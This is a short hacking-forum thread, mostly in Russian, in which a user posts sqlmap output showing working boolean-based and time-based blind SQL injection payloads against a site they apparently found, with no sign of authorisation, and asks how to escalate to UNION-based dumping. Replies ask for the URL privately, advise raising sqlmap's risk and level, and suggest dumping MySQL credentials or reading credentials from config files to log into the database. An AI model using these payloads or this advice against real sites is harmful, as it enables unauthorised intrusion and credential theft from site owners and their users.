Вопрос по sql injection

[x3lh1x]

Доброго времени суток.

Нашел скулю на сайте
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=3 AND 8506=8506
Vector: AND [INFERENCE]

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: type=3 AND (SELECT 2467 FROM (SELECT(SLEEP(5)))XmTO)
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
Но каким образом можно разогнать скулю до юнионки?(Union Query), дампить булином или таймом такое себе удовольствие.

Прикрепляю баннер
web application technology: PHP, Nginx
back-end DBMS: MySQL >= 8.0.0
banner: '5.6.16-log'
Искать другой вектор атаки или может быть с помощью тамперов можно будет что-то придумать?

 

[royal_]

PM me the URL

 

[x3lh1x]

PM me the URL

Спасибо за предложение, отправил в лс.

 

[no1]

Thanks for the offer, but no)

Man, you quoted a sqlmap output that only finds boolean based injection and ask "HoW tO Do UnIoN ? :3"
If sqlmap does not find a way to union by itself the only alternative is to let a kind expert work on the case and try to find a way to union inject the thing. So asking this kind of question giving this kind of context is not realy smart at my opinion.

This beeing said you can try to increase --risk=3 --level=5 to be sure sqlmap doesnt find something else thant boolean blind. But without letting people help you, you have no other possibilities.

You also could bypass your issue by dumping mysql creds or trying to read creds from config files with READ_FILE and attempt to log into the sql server.